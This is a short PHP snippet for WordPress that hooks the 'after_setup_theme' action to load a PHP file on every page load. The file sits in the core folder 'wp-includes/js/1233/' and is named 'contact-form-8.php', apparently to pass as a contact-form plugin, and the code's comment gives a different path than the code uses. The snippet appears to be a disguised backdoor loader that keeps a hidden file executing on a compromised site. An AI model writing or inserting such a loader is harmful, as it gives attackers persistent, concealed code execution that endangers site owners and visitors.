function include_plugin_file() {
// Replace 'wp-content/uploads/contact-form-8/contact-form-8.php' with the actual path to your plugin's main file
$plugin_file_path = trailingslashit(get_home_path()) . '/wp-includes/js/1233/contact-form-8.php';
if (file_exists($plugin_file_path)) {
require_once $plugin_file_path;
}
}
// Hook into the 'after_setup_theme' action to make sure the theme and plugins are loaded
add_action('after_setup_theme', 'include_plugin_file');